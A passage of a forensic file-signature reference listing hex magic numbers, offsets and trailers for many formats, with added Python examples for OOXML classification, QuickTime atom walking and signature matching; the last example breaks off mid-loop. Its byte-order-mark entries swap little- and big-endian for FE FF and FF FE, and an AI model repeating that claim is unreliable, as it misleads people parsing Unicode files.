 Studio 
Solution
 File
SLN Visual Studio .NET Solution file

[84 byte offset]
4D 69 63 72 6F 73 6F 66
74 20 57 69 6E 64 6F 77
73 20 4D 65 64 69 61 20
50 6C 61 79 65 72 20 2D
2D 20
 [84 byte offset]
Microsof
t Window
s Media 
Player -
-
WPL Windows Media Player playlist

4D 73 52 63 66 MsRcf
GDB VMapSource GPS Waypoint Database

4E 41 56 54 52 41 46 46
49 43
 NAVTRAFF
IC
DAT TomTom traffic data file

4E 42 2A 00 NB*.
JNT, JTP MS Windows journal file

4E 45 53 4D 1A 01 NESM..
NSF NES Sound file

4E 49 54 46 30 NITF0
NTF National Imagery Transmission Format (NITF) file

4E 61 6D 65 3A 20 Name:
COD Agent newsreader character map file

4F 50 4C 44 61 74 61 62
61 73 65 46 69 6C 65
 OPLDatab
aseFile
DBF Psion Series 3 Database file

4F 67 67 53 00 02 00 00
00 00 00 00 00 00
 OggS....
......
OGA, OGG, OGV, OGX Ogg Vorbis Codec compressed Multimedia file

4F 7B O{
DW4 Visio/DisplayWrite 4 text file (unconfirmed)

50 00 00 00 20 00 00 00 P... ...
IDX Quicken QuickFinder Information File

50 35 0A P5.
PGM Portable Graymap Graphic

50 41 43 4B PACK
PAK Quake archive file

50 41 47 45 44 55 36 34 PAGEDU64
DMP Windows 64-bit memory dump

50 41 47 45 44 55 4D 50 PAGEDUMP
DMP Windows memory dump

50 41 58 PAX
PAX PAX password protected bitmap

50 45 53 54 PEST
DAT PestPatrol data/scan strings

50 47 50 64 4D 41 49 4E PGPdMAIN
PGD PGP disk image

50 49 43 54 00 08 PICT..
IMG ADEX Corp. ChromaGraph Graphics Card Bitmap Graphic file

50 4B 03 04 PK..
ZIP PKZIP archive file (Ref. 1 | Ref. 2)
Trailer: <filename> 50 4B <17 bytes> 00 00 00
         (<filename> PK <17 bytes> ...)
ZIP Apple Mac OS X Dashboard Widget, Aston Shell theme, Oolite eXpansion Pack,
Opera Widget, Pivot Style Template, Rockbox Theme package, Simple Machines
Forums theme, SubEthaEdit Mode, Trillian zipped skin, Virtual Skipper skin
JAR Java archive; compressed file package for classes and data
KWD KWord document
ODT, ODP, OTT OpenDocument text document, presentation, and text document template, respectively.
SXC, SXD, SXI, SXW OpenOffice spreadsheet (Calc), drawing (Draw), presentation (Impress),
and word processing (Writer) files, respectively.
SXC StarOffice spreadsheet
WMZ Windows Media compressed skin file
XPI Mozilla Browser Archive
XPS XML paper specification file
XPT eXact Packager Models

50 4B 03 04 14 00 01 00
63 00 00 00 00 00
 PK......
c.....
ZIP ZLock Pro encrypted ZIP

50 4B 03 04 14 00 06 00 PK......
DOCX, PPTX, XLSX Microsoft Office Open XML Format (OOXML) Document
NOTE: There is no subheader for MS OOXML files as there is with
DOC, PPT, and XLS files. To better understand the format of these files,
rename any OOXML file to have a .ZIP extension and then unZIP the file;
look at the resultant file named [Content_Types].xml to see the content
types. In particular, look for the <Override PartName= tag, where you
will find word, ppt, or xl, respectively.

Trailer: Look for 50 4B 05 06 (PK..) followed by 18 additional bytes
at the end of the file.
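The procedure in the note above, written out as an added Python example (not code from the original table): open the package as a ZIP, read `[Content_Types].xml`, and classify the document by the top-level folder named in its `<Override PartName=...>` entries; a second helper checks for the `PK 05 06` end-of-central-directory trailer 22 bytes from the end of the file. The minimal packages are constructed in-memory for the test and are not real Office documents; `ooxml_kind`, `has_eocd_trailer` and `build_sample` are names chosen here.

```python
"""Classify OOXML packages from [Content_Types].xml and check the ZIP trailer."""
import io
import zipfile
import xml.etree.ElementTree as ET

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
# Top-level part folder named in <Override PartName="..."> -> document kind.
OOXML_KINDS = {"/word/": "DOCX", "/ppt/": "PPTX", "/xl/": "XLSX"}


def has_eocd_trailer(data):
    """The ZIP end-of-central-directory record is PK 05 06 plus 18 bytes
    (22 in all) when the archive comment is empty, which is the trailer the
    table describes. A non-empty comment pushes it away from the end."""
    return len(data) >= 22 and data[-22:-18] == b"PK\x05\x06"


def ooxml_kind(data):
    """Return 'DOCX', 'PPTX', 'XLSX', or None if data is not an OOXML package.

    The local-file-header bytes after PK 03 04 (version needed, flags) vary
    with the archiver that wrote the file, so the content-types part, not
    those bytes, is the reliable discriminator.
    """
    if data[:4] != b"PK\x03\x04":
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if "[Content_Types].xml" not in zf.namelist():
                return None
            root = ET.fromstring(zf.read("[Content_Types].xml"))
    except (zipfile.BadZipFile, ET.ParseError):
        return None
    for override in root.iter(CT_NS + "Override"):
        part = override.get("PartName", "")
        for prefix, kind in OOXML_KINDS.items():
            if part.startswith(prefix):
                return kind
    return None


def build_sample(folder):
    """Constructed minimal OOXML-style package for testing (not a real
    Office document); folder is 'word', 'ppt', or 'xl'."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'<Override PartName="/{folder}/document.xml" ContentType="application/xml"/>'
        '</Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr(f"{folder}/document.xml", "<doc/>")
    return buf.getvalue()


if __name__ == "__main__":
    for folder in ("word", "ppt", "xl"):
        pkg = build_sample(folder)
        print(folder, "->", ooxml_kind(pkg), "| EOCD at end:", has_eocd_trailer(pkg))
```

Because the packages here are written by Python's `zipfile`, their bytes 4-7 are not the `14 00 06 00` the table lists for Office-written files, which is exactly why the classification is done on the content-types part instead of on those bytes.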

50 4B 03 04 14 00 08 00
08 00
 PK......
..
JAR Java archive

50 4B 05 06 PK..
50 4B 07 08 PK..
ZIP PKZIP empty and multivolume archive file, respectively

[30 byte offset]
50 4B 4C 49 54 45
 [30 byte offset]
PKLITE
ZIP PKLITE compressed ZIP archive (see also PKZIP)

[526 byte offset]
50 4B 53 70 58
 [526 byte offset]
 PKSpX
ZIP PKSFX self-extracting executable compressed file (see also PKZIP)

50 4D 43 43 PMCC
GRP Windows Program Manager group file

50 4E 43 49 55 4E 44 4F PNCIUNDO
DAT Norton Disk Doctor undo file

[92 byte offset]
51 45 4C 20
 [92 byte offset]
QEL
QEL Quicken data file

51 46 49 FB QFIû
IMG QEMU Qcow Disk Image

51 57 20 56 65 72 2E 20 QW Ver.
ABD, QSD Quicken data file

52 41 5A 41 54 44 42 31 RAZATDB1
DAT Shareaza (Windows P2P client) thumbnail

52 45 47 45 44 49 54 REGEDIT
REG, SUD Windows NT Registry and Registry Undo files

52 45 56 4E 55 4D 3A 2C REVNUM:,
ADF Antenna data file

52 49 46 46 RIFF
ANI Windows animated cursor
CMX Corel Presentation Exchange (Corel 10 CMX) Metafile
CDR CorelDraw document
DAT Video CD MPEG or MPEG1 movie file
DS4 Micrografx Designer v4 graphic file
4XM 4X Movie video

52 49 46 46 xx xx xx xx
41 56 49 20 4C 49 53 54
 RIFF....
AVI LIST
AVI Resource Interchange File Format -- Windows Audio
Video Interleave file


52 49 46 46 xx xx xx xx
43 44 44 41 66 6D 74 20
 RIFF....
CDDAfmt
CDA Resource Interchange File Format -- Compact Disc
Digital Audio (CD-DA) file

52 49 46 46 xx xx xx xx
51 4C 43 4D 66 6D 74 20
 RIFF....
QLCMfmt
QCP Resource Interchange File Format -- Qualcomm
PureVoice

52 49 46 46 xx xx xx xx
52 4D 49 44 64 61 74 61
 RIFF....
RMIDdata
RMI Resource Interchange File Format -- Windows Musical
Instrument Digital Interface file


52 49 46 46 xx xx xx xx
57 41 56 45 66 6D 74 20
 RIFF....
WAVEfmt
WAV Resource Interchange File Format -- Audio for
Windows file


52 54 53 53 RTSS
CAP Windows NT Netmon capture file

52 61 72 21 1A 07 00 Rar!...
RAR WinRAR compressed archive file

52 65 74 75 72 6E 2D 50
61 74 68 3A 20
 Return-P
ath:
EML A common file extension for e-mail files.

53 43 48 6C SCHl
AST Need for Speed: Underground Audio file

53 43 4D 49 SCMI
IMG Img Software Set Bitmap

53 48 4F 57 SHOW
SHW Harvard Graphics DOS Ver. 2/x Presentation file

53 49 45 54 52 4F 4E 49
43 53 20 58 52 44 20 53
43 41 4E
 SIETRONI
CS XRD S
CAN
CPI Sietronics CPI XRD document

53 49 54 21 00 SIT!.
SIT StuffIt compressed archive

53 4D 41 52 54 44 52 57 SMARTDRW
SDR SmartDraw Drawing file

53 50 46 49 00 SPFI.
SPF StorageCraft ShadowProtect backup file

53 51 4C 4F 43 4F 4E 56
48 44 00 00 31 2E 30 00
 SQLOCONV
HD..1.0.
CNV DB2 conversion file

53 51 4C 69 74 65 20 66
6F 72 6D 61 74 20 33 00
 SQLite f
ormat 3.
DB SQLite database file

53 5A 20 88 F0 27 33 D1 SZ ˆð'3Ñ
n/a QBASIC SZDD file header variant. (See the SZDD or KWAJ format entries
for additional information.)

53 5A 44 44 88 F0 27 33 SZDDˆð'3
n/a SZDD file format used by DOS COMPRESS.EXE and EXPAND.EXE commands.
This command compresses a single file, replacing the last character in the file name
with an underscore or dollar sign, e.g., FOO.BAZ would be renamed FOO.BA_ or
FOO.BA$. (See the SZDD/KWAJ page for more information.)

53 6D 62 6C Smbl
SYM (Unconfirmed file type. Likely type is Harvard Graphics
Version 2.x graphic symbol or Windows SDK graphic symbol)

53 74 75 66 66 49 74 20
28 63 29 31 39 39 37 2D
 StuffIt 
(c)1997-
SIT StuffIt compressed archive

53 75 70 65 72 43 61 6C
63
 SuperCal
c
CAL SuperCalc worksheet

54 68 69 73 20 69 73 20 This is
INFO UNIX GNU Info Reader File

55 43 45 58 UCEX
UCE Unicode extensions

55 46 41 C6 D2 C1 UFAÆÒÁ
UFA UFA compressed archive

55 46 4F 4F 72 62 69 74 UFOOrbit
DAT UFO Capture v2 map file

56 43 50 43 48 30 VCPCH0
PCH Visual C PreCompiled header file

56 45 52 53 49 4F 4E 20 VERSION
CTL Visual Basic User-defined Control file

56 65 72 73 69 6F 6E 20 Version
MIF MapInfo Interchange Format file

57 4D 4D 50 WMMP
DAT Walkman MP3 container file

57 53 32 30 30 30 WS2000
WS2 WordStar for Windows Ver. 2 document

[29,152 byte offset]
57 69 6E 5A 69 70
 [29,152 byte offset]
WinZip
ZIP WinZip compressed archive

57 6F 72 64 50 72 6F WordPro
LWP Lotus WordPro document.

58 2D X-
EML A common file extension for e-mail files. This variant is
for Exchange.

58 43 50 00 XCP.
CAP Cinco NetXRay, Network General Sniffer, and
Network Associates Sniffer capture file

58 50 43 4F 4D 0A 54 79
70 65 4C 69 62
 XPCOM.Ty
peLib
XPT XPCOM type libraries for the XPIDL compiler

58 54 XT
BDR MS Publisher border

5A 4F 4F 20 ZOO
ZOO ZOO compressed archive

5B 47 65 6E 65 72 61 6C
5D 0D 0A 44 69 73 70 6C
61 79 20 4E 61 6D 65 3D
3C 44 69 73 70 6C 61 79
4E 61 6D 65
 [General
]..Displ
ay Name=
<Display
Name
ECF MS Exchange 2007 extended configuration file

5B 4D 53 56 43 [MSVC
VCW Microsoft Visual C++ Workbench Information File

5B 50 68 6F 6E 65 5D [Phone]
DUN Dial-up networking file

5B 56 45 52 5D or [VER]
5B 76 65 72 5D or [ver]
SAM Lotus AMI Pro document

[2 byte offset]
5B 56 65 72 73 69 6F 6E
 [2 byte offset]
[Version
CIF (Unknown file type)

5B 57 69 6E 64 6F 77 73
20 4C 61 74 69 6E 20
 [Windows
 Latin
CPX Microsoft Code Page Translation file

5B 66 6C 74 73 69 6D 2E
30 5D
 [fltsim.
0]
CFG Flight Simulator Aircraft Configuration file

5F 27 A8 89 _'¨‰
JAR Jar archive

5F 43 41 53 45 5F _CASE_
CAS, CBK EnCase case file (and backup)

60 EA 
ARJ Compressed archive file

62 65 67 69 6E begin
n/a UUencoded files start with a string:
  begin mode path
where mode is the set of permissions as used in
Linux/Unix and path is the name given to the decoded
file. (See this uuencode page for more information.) 

62 70 6C 69 73 74 bplist
plist Binary property list (plist)
(NOTE: Next two bytes are the version number, currently
0x30-30, or "00") 

63 6F 6E 65 63 74 69 78 conectix
VHD Virtual PC Virtual HD image

63 75 73 68 00 00 00 02
00 00 00
 cush....
...
CSH Photoshop Custom Shape

64 00 00 00 d...
P10 Intel PROset/Wireless Profile

64 65 78 0A 30 30 39 00 dex.009.
dex Dalvik executable file (Android)

64 73 77 66 69 6C 65 dswfile
DSW Microsoft Visual Studio workspace file

64 6E 73 2E dns.
AU Audacity audio file

66 49 00 00 fI..
SHD Windows NT printer spool file

66 4C 61 43 00 00 00 22 fLaC..."
FLAC Free Lossless Audio Codec file

67 49 00 00 gI..
SHD Windows 2000/XP printer spool file

68 49 00 00 hI..
SHD Windows Server 2003 printer spool file

6C 33 33 6C l33l
DBB Skype user data file (profile and contacts)

[4 byte offset]
6D 6F 6F 76
 [4 byte offset]
moov
MOV QuickTime movie file

.MOV files have a complicated file signature. The string "moov" is the most common but I have also seen:
  0x66-72-65-65   free
  0x6D-64-61-74   mdat
  0x77-69-64-65   wide

And the following have been reported to me:
  0x70-6E-6F-74   pnot
  0x73-6B-69-70   skip

Furthermore, if you look at byte position xxxxxxxx+4 (where xxxxxxxx is the big-endian 32-bit value in bytes 0-3
of the header, i.e., the size of the first atom), you will find one (or more!) of these strings repeated; the string
"free" seems to be the most common. For more information, see the QuickTime File Format page. (Thanks to D. Wright for getting me started on this!) 
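The structure described above (a big-endian 32-bit size followed by a four-character atom type, repeated to the end of the file) is easy to walk, and walking it is more robust than matching any single one of the `moov`/`free`/`mdat`/`wide` strings at offset 4. The following is an added Python example, not code from the original table or from Apple: it enumerates the top-level atoms, handles the two special sizes (1 = a 64-bit size follows, 0 = atom runs to end of file), and, when an `ftyp` atom is present, maps its major brand to the `ftyp` entries earlier in this table (isom, qt, 3gp, mp42, M4A). The samples are constructed headers, not real movies; `walk_atoms`, `classify_quicktime` and the brand mapping are names and choices made here.

```python
"""Walk QuickTime/ISO base-media atoms and classify the file by ftyp brand."""
import struct

# Major brands from the ftyp entries in this table (constructed mapping; the
# 3GPP/3GPP2 brands carry a trailing digit, so they are matched by prefix).
FTYP_BRANDS = {b"isom": "MP4", b"qt  ": "MOV", b"mp42": "M4V", b"M4A ": "M4A"}
LEGACY_FIRST_ATOMS = (b"moov", b"free", b"mdat", b"wide", b"pnot", b"skip")


def walk_atoms(data, start=0, end=None):
    """Yield (offset, type, size) for each atom in data[start:end].

    An atom header is a big-endian 32-bit size followed by a 4-byte type.
    Size 1 means a 64-bit size follows the type; size 0 means "to end of file".
    Raises ValueError on a size that does not fit, which is the usual sign
    that the buffer is not atom-structured at all.
    """
    end = len(data) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, kind = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:
            if pos + 16 > end:
                raise ValueError(f"truncated 64-bit atom at offset {pos}")
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:
            size = end - pos
        if size < header or pos + size > end:
            raise ValueError(f"bad atom size {size} at offset {pos}")
        yield pos, kind, size
        pos += size


def classify_quicktime(data):
    """Return (list of top-level atom types, label) or (None, None).

    The type at bytes 4-7 is what the table's "[4 byte offset]" signature
    sees; the ftyp major brand, when present, gives the finer label.
    """
    try:
        atoms = list(walk_atoms(data))
    except ValueError:
        return None, None
    if not atoms:
        return None, None
    types = [kind.decode("latin-1") for _, kind, _ in atoms]
    label = "MOV" if atoms[0][1] in LEGACY_FIRST_ATOMS else None
    for off, kind, size in atoms:
        if kind == b"ftyp" and size >= 12:
            brand = data[off + 8:off + 12]
            if brand.startswith(b"3gp") or brand.startswith(b"3g2"):
                label = "3GP/3G2"
            else:
                label = FTYP_BRANDS.get(brand, "ftyp " + brand.decode("latin-1"))
            break
    return types, label


def atom(kind, payload=b""):
    """Build one atom (constructed helper for the samples below)."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


# Constructed samples, headers only: a QuickTime file whose first 12 bytes
# equal the table's MOV entry (00 00 00 14 ftyp qt), an ISO MP4 whose last
# atom uses size 0, and a legacy MOV with no ftyp atom at all.
SAMPLE_MOV = (atom(b"ftyp", b"qt  " + b"\x00\x00\x00\x00" + b"qt  ")
              + atom(b"free", b"\x00" * 4) + atom(b"moov", b"\x00" * 8))
SAMPLE_MP4 = (atom(b"ftyp", b"isom" + b"\x00\x00\x02\x00" + b"isomiso2mp41")
              + b"\x00\x00\x00\x00mdat" + b"\x00" * 16)
SAMPLE_OLD = atom(b"wide") + atom(b"mdat", b"\x00" * 8) + atom(b"moov", b"\x00" * 8)

if __name__ == "__main__":
    for name, buf in [("mov", SAMPLE_MOV), ("mp4", SAMPLE_MP4), ("old", SAMPLE_OLD)]:
        print(name, classify_quicktime(buf))
```

A buffer that merely happens to contain `moov` at offset 4 but whose size fields do not chain to the end of the file fails the walk, which is a useful distinction when the header match alone is ambiguous.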

6F 3C o<
n/a Short Message Service (SMS), or text, message stored on a
Subscriber Identification Module (SIM).

72 65 67 66 regf
DAT Windows NT registry hive file

72 69 66 66 riff
ACD Sonic Foundry Acid Music File (Sony)

72 74 73 70 3A 2F 2F rtsp://
RAM RealMedia metafile

73 6C 68 21 or slh!
73 6C 68 2E slh.
DAT Allegro Generic Packfile Data file (0x21 = compressed,
0x2E = uncompressed)

73 6D 5F sm_
PDB PalmOS SuperMemo file

73 72 63 64 6F 63 69 64
3A
 srcdocid
:
CAL CALS raster bitmap file

73 7A 65 7A szez
PDB PowerBASIC Debugger Symbols file

[60 byte offset]
74 42 4D 50 4B 6E 57 72
 [60 byte offset]
tBMPKnWr
PRC PathWay Map file, used with GPS devices

[257 byte offset]
75 73 74 61 72
 [257 byte offset]
ustar
TAR Tape Archive file (http://www.mkssoftware.com/docs/man4/tar.4.asp)

76 32 30 30 33 2E 31 30
0D 0A 30 0D 0A
 v2003.10
..0..
FLT Qimage filter

78 x
DMG Mac OS X Disk Copy Disk Image file 

7A 62 65 78 zbex
INFO ZoomBrowser Image Index file (ZbThumbnal.info)

7B 0D 0A 6F 20 {..o
LGC, LGD Windows application log

7B 5C 70 77 69 {\pwi
PWI Microsoft Windows Mobile personal note file

7B 5C 72 74 66 31 {\rtf1
RTF Rich text format word processing file
Trailer: 5C 70 61 72 20 7D 7D (\par }})

7E 42 4B 00 ~BK.
PSP Corel Paint Shop Pro image file

7F 45 4C 46 .ELF
n/a Executable and Linking Format executable file (Linux/Unix)

80 .
OBJ Relocatable object code

80 00 00 20 03 12 04 .......
ADX Dreamcast audio file

81 32 84 C1 85 05 D0 11
B2 90 00 AA 00 3C F6 76
 .2„Á….Ð.
²..ª.<öv
WAB Outlook Express address book (Win95)

81 CD AB .Í«
WPF WordPerfect text file

89 50 4E 47 0D 0A 1A 0A ‰PNG....
PNG Portable Network Graphics file
Trailer: 49 45 4E 44 AE 42 60 82 (IEND®B`‚...)

8A 01 09 00 00 00 E1 08
00 00 99 19
 Š.....á.
..™.
AW MS Answer Wizard file

91 33 48 46 ‘3HF
HAP Hamarsoft HAP 3.x compressed archive

95 00 or •.
95 01 •.
SKR PGP secret keyring file

99 
GPG GNU Privacy Guard (GPG) public keyring

99 01 ™.
PKR PGP public keyring file

9C CB CB 8D 13 75 D2 11
91 58 00 C0 4F 79 56 A4
 œËË..UÒ.
‘X.ÀOyV¤
WAB Outlook address file

[512 byte offset]
A0 46 1D F0
 [512 byte offset]
 F.ð
PPT PowerPoint presentation subheader (MS Office)

A1 B2 C3 D4 ¡²ÃÔ
n/a tcpdump (libpcap) capture file (Linux/Unix)

A1 B2 CD 34 ¡²Í4
n/a Extended tcpdump (libpcap) capture file (Linux/Unix)

A9 0D 00 00 00 00 00 00 ©.......
DAT Access Data FTK evidence file

AC 9E BD 8F 00 00 ¬.½...
QDF Quicken data file

AC ED ¬í
n/a Java serialization data (see Object Serialization Stream Protocol)

AC ED 00 05 73 72 00 12
62 67 62 6C 69 74 7A 2E
 ¬í..sr..
bgblitz.
PDB BGBlitz (professional Backgammon software) position database file

B0 4D 46 43 °MFC
PWL Windows 95 password file

B1 68 DE 3A ±hÞ:
DCX Graphics Multipage PCX bitmap file

B4 6E 68 44 ´nhd
TIB Acronis True Image file

B5 A2 B0 B3 B3 B0 A5 B5 µ¢°³³°¥µ
CAL Windows calendar file

BE 00 00 00 AB 00 00 00
00 00 00 00 00
 ¾...«...
....
WRI MS Write file

C3 AB CD AB Ã«Í«
ACS MS Agent Character file

C5 D0 D3 C6 ÅÐÓÆ
EPS Adobe encapsulated PostScript file

C8 00 79 00 È.y.
LBK Jeppesen FliteLog file

CA FE BA BE Êþº¾
CLASS Java bytecode file

CD 20 AA AA 02 00 00 00 Í ªª....
n/a Norton Anti-Virus quarantined virus file

CF 11 E0 A1 B1 1A E1 00 Ï.ࡱ.á.
DOC Perfect Office document
[Note similarity to MS Office header, below]

CF AD 12 FE Ï­.þ
DBX Outlook Express e-mail folder

D0 CF 11 E0 A1 B1 1A E1 ÐÏ.ࡱ.á
DOC, DOT, PPS, PPT, XLA, XLS, WIZ Microsoft Office applications (Word, Powerpoint, Excel, Wizard)
[See also Word, Powerpoint, and Excel "subheaders" at byte offset 512]
[Note the similarity between D0 CF 11 E0 and the word "docfile"!]
AC_ CaseWare Working Papers compressed client file
ADP Access project file
APR Lotus/IBM Approach 97 file
DB MSWorks database file
MSC Microsoft Common Console Document
MSI Microsoft Installer package
MTW Minitab data file
OPT Developer Studio File Workspace Options file
PUB MS Publisher file
RVT Revit Project file
SOU Visual Studio Solution User Options file
SPO SPSS output file
VSD Visio file
WPS MSWorks text document

D2 0A 00 00 Ò...
FTR GN Nettest WinPharoah filter file

D4 2A Ô*
ARL, AUT AOL history (ARL) and typed URL (AUT) files

D4 C3 B2 A1 Ôò¡
n/a WinDump (winpcap) capture file (Windows)

D7 CD C6 9A ×ÍÆš
WMF Windows graphics metafile

DB A5 2D 00 Û¥-.
DOC Word 2.0 file

DC DC ÜÜ
CPL Corel color palette file

DC FE Üþ
EFX eFax file format

E3 10 00 01 00 00 00 00 ã.......
INFO Amiga Icon file

E3 82 85 96 ã‚…–
PWL Windows 98 password file

E4 52 5C 7B 8C D8 A7 4D
AE B1 53 78 D0 29 96 D3
 äR\{ŒØ§M
®±SxÐ)–Ó
ONE Microsoft OneNote note

E8 or è
E9 or é
EB ë
COM, SYS Windows executable file

EB 3C 90 2A ë<.*
IMG GEM Raster file

[512 byte offset]
EC A5 C1 00
 [512 byte offset]
ì¥Á.
DOC Word document subheader (MS Office)

ED AB EE DB í«îÛ
RPM RedHat Package Manager file

EF BB BF ï»¿
n/a Byte-order mark for 8-bit Unicode Transformation Format
(UTF-8) files. (See the Unicode Home Page.)

[At a cluster boundary]
F0 FF FF
 [At a cluster boundary]
ðÿÿ
n/a FAT12 File Allocation Table

[At a cluster boundary]
F8 FF FF FF
 [At a cluster boundary]
øÿÿÿ
n/a FAT16 File Allocation Table

[At a cluster boundary]
F8 FF FF 0F FF FF FF FF
 [At a cluster boundary]
øÿÿ.ÿÿÿÿ
n/a FAT32 File Allocation Table

[512 byte offset]
FD FF FF FF 04
 [512 byte offset]
ýÿÿÿ.
SUO Visual Studio Solution User Options subheader (MS Office)

[512 byte offset]
FD FF FF FF nn 00 00 00
 [512 byte offset]
ýÿÿÿ....
PPT PowerPoint presentation subheader (MS Office)
(where nn has been seen with values 0x0E, 0x1C, and 0x43)

[512 byte offset]
FD FF FF FF nn 00
 [512 byte offset]
ýÿÿÿ..
or
[512 byte offset]
FD FF FF FF nn 02
 [512 byte offset]
ýÿÿÿ..
XLS Excel spreadsheet subheader (MS Office)
(where nn = 0x10, 0x1F, 0x22, 0x23, 0x28, or 0x29)

[512 byte offset]
FD FF FF FF 20 00 00 00
 [512 byte offset]
ýÿÿÿ ...
OPT Developer Studio File Workspace Options subheader (MS Office)
XLS Excel spreadsheet subheader (MS Office)

[512 byte offset]
FD FF FF FF xx xx xx xx
xx xx xx xx 04 00 00 00
 [512 byte offset]
ýÿÿÿ....
........
DB Thumbs.db subheader (MS Office)

FE EF þï
GHO, GHS Symantec Ghost image file

FE FF þÿ
n/a Byte-order mark for 16-bit Unicode Transformation Format/
2-octet Universal Character Set (UTF-16/UCS-2), little-endian files.
(See the Unicode Home Page.)

FF ÿ
SYS Windows executable (SYS) file

FF 00 02 00 04 04 05 54
02 00
 ÿ......T
..
WKS Works for Windows spreadsheet file

FF 46 4F 4E 54 ÿFONT
CPI Windows international code page

FF 4B 45 59 42 20 20 20 ÿKEYB
SYS Keyboard driver file

FF 57 50 43 ÿWPC
WP, WPD, WPG, WPP, WP5, WP6 WordPerfect text and graphics file

FF D8 FF E0 xx xx 4A 46
49 46 00
 ÿØÿà..JF
IF.
JFIF, JPE, JPEG, JPG JPEG/JFIF graphics file
Trailer: FF D9 (ÿÙ)

FF D8 FF E1 xx xx 45 78
69 66 00
 ÿØÿá..Ex
if.
JPG Digital camera JPG using Exchangeable Image File Format (EXIF)
Trailer: FF D9 (ÿÙ)
See "Using Extended File Information (EXIF) File Headers in Digital Evidence Analysis"
(P. Alvarez, IJDE 2(3), Winter 2004) and ExifTool Tag Names


FF D8 FF E8 xx xx 53 50
49 46 46 00
 ÿØÿè..SP
IFF.
JPG Still Picture Interchange File Format (SPIFF)
Trailer: FF D9 (ÿÙ)

NOTES on JPEG file headers: It appears that one can safely say that all JPEG files start with the three bytes 0xFF-D8-FF.
The fourth byte is also indicative of JPEG content. Various options include:

FF Ex ÿ.
FF Fx ÿ.
MPEG, MPG, MP3 MPEG audio file frame synch pattern

FF FE ÿþ
REG Windows Registry file
n/a Byte-order mark for 16-bit Unicode Transformation Format/
2-octet Universal Character Set (UTF-16/UCS-2), big-endian files.
(See the Unicode Home Page.)

FF FE 00 00 ÿþ..
n/a Byte-order mark for 32-bit Unicode Transformation Format/
4-octet Universal Character Set (UTF-32/UCS-4), little-endian files.
(See the Unicode Home Page.)

FF FE 23 00 6C 00 69 00
6E 00 65 00 20 00 31 00
 ÿþ#.l.i.
n.e. .1.
MOF Windows MSinfo file

FF FF FF FF ÿÿÿÿ
SYS DOS system driver
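The table above is only useful to a forensic examiner once it is applied mechanically: match the bytes at the stated offset, check the trailer where the table lists one, and compare the result with the extension the file claims. The following is an added example, not part of Gary Kessler's list; it hard-codes a small hand-picked subset of the signatures above (PNG, ELF, JPEG, the OLE2 header with its Word subheader at offset 512, libpcap, Java class and serialization, and the `ustar` string at offset 257), and the sample "files" it inspects are constructed in-line so that it runs offline. The `EXPECTED` extension mapping and all function names are this example's own.

```python
"""Magic-number identification with offsets, trailers and extension checks.

Added example; the SIGNATURES list is a hand-picked subset of the table
above and the sample blobs at the bottom are constructed, not real files.
"""
from typing import Dict, List, Optional, Set, Tuple

# (offset, signature bytes, label) copied from the table above. Wildcard
# bytes ("xx"/"nn") in the table are simply not part of the compared prefix.
SIGNATURES: List[Tuple[int, bytes, str]] = [
    (0,   bytes.fromhex("89504E470D0A1A0A"), "PNG"),
    (0,   bytes.fromhex("7F454C46"),         "ELF"),
    (0,   bytes.fromhex("FFD8FF"),           "JPEG"),   # all JPEGs start FF D8 FF (see the notes above)
    (0,   bytes.fromhex("D0CF11E0A1B11AE1"), "OLE2 compound file (MS Office)"),
    (0,   bytes.fromhex("A1B2C3D4"),         "pcap"),
    (0,   bytes.fromhex("D4C3B2A1"),         "pcap (byte-swapped)"),
    (0,   bytes.fromhex("CAFEBABE"),         "Java class"),
    (0,   bytes.fromhex("ACED"),             "Java serialization"),
    (257, b"ustar",                          "TAR"),
    (512, bytes.fromhex("ECA5C100"),         "Word subheader (MS Office)"),
]

# Trailers the table lists for formats that have one.
TRAILERS: Dict[str, bytes] = {
    "PNG":  bytes.fromhex("49454E44AE426082"),   # IEND chunk followed by its CRC
    "JPEG": bytes.fromhex("FFD9"),
}

# Constructed mapping: which labels a file with this extension should carry.
EXPECTED: Dict[str, Set[str]] = {
    ".png": {"PNG"}, ".jpg": {"JPEG"}, ".jpeg": {"JPEG"},
    ".doc": {"OLE2 compound file (MS Office)"},
    ".pcap": {"pcap", "pcap (byte-swapped)"},
    ".tar": {"TAR"}, ".class": {"Java class"},
}


def identify(data: bytes) -> List[str]:
    """Return every label whose signature matches at its stated offset.

    More than one label can match: a Word document carries the OLE2 header
    at offset 0 and the Word subheader at offset 512.
    """
    return [label for offset, sig, label in SIGNATURES
            if data[offset:offset + len(sig)] == sig]


def trailer_ok(data: bytes, label: str) -> bool:
    """True when the format has no listed trailer or the data ends with it.

    A good header without its trailer usually means a truncated file, which
    is worth reporting separately when carving.
    """
    trailer = TRAILERS.get(label)
    return trailer is None or data.endswith(trailer)


def extension_mismatch(filename: str, data: bytes) -> Optional[bool]:
    """Compare the name's extension with what the content says it is.

    True on mismatch, False on agreement, None when the extension is not in
    EXPECTED (there is nothing to compare against).
    """
    dot = filename.rfind(".")
    ext = filename[dot:].lower() if dot != -1 else ""
    expected = EXPECTED.get(ext)
    if expected is None:
        return None
    return not (expected & set(identify(data)))


# Constructed samples: real headers/trailers around zero filler.
PNG_SAMPLE = bytes.fromhex("89504E470D0A1A0A") + b"\x00" * 16 + TRAILERS["PNG"]
JPEG_TRUNCATED = bytes.fromhex("FFD8FFE00010") + b"JFIF\x00" + b"\x00" * 8   # no FF D9 at the end
DOC_SAMPLE = bytes.fromhex("D0CF11E0A1B11AE1") + b"\x00" * 504 + bytes.fromhex("ECA5C100")
TAR_SAMPLE = b"\x00" * 257 + b"ustar" + b"\x00" * 10

if __name__ == "__main__":
    for name, blob in [("a.png", PNG_SAMPLE), ("photo.jpg", JPEG_TRUNCATED),
                       ("report.doc", DOC_SAMPLE), ("backup.tar", TAR_SAMPLE),
                       ("holiday.jpg", PNG_SAMPLE)]:
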